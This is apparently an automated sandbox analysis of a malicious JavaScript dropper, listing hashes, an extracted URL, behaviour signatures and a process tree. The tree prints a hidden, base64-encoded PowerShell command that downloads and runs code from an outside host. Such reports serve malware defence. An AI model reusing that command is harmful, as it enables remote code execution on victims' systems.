Analysis
-
max time kernel
150s -
max time network
161s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
25-12-2023 05:41
Static task
static1
Behavioral task
behavioral1
Sample
08cf9eec8e6df29324864f7ef051e486.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
08cf9eec8e6df29324864f7ef051e486.js
Resource
win10v2004-20231215-en
General
-
Target
08cf9eec8e6df29324864f7ef051e486.js
-
Size
70KB
-
MD5
08cf9eec8e6df29324864f7ef051e486
-
SHA1
4b19eb67d845e83502a2ea6e95d3815971451ca1
-
SHA256
98760f05bc3b59be0b175413aed69c13ebfe49c0978f11d5f60f53d45cc1ee19
-
SHA512
6fa8a0778657e9ef83a8a7bd8ad894dcd36cb7aed26e6a8dea0d1e3f58999c90618008b34a52817b8e941826b01585759ab270e88382d3a6e6adf53a5c6b430a
-
SSDEEP
1536:ssj9Ry98guHVBqqg2bcruayUHmLKeZaMU7GwbWBPwVGWl9SZ8kV8Gp/5bzIEN4td:ssj9Ry98guHVBqqg2bcruzUHmLKeMMUX
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 16 4436 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation wscript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4436 powershell.exe 4436 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4436 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 548 wrote to memory of 4516 548 wscript.exe 87 PID 548 wrote to memory of 4516 548 wscript.exe 87 PID 4516 wrote to memory of 4436 4516 cmd.exe 89 PID 4516 wrote to memory of 4436 4516 cmd.exe 89
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\08cf9eec8e6df29324864f7ef051e486.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:548 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:4516 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4436
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82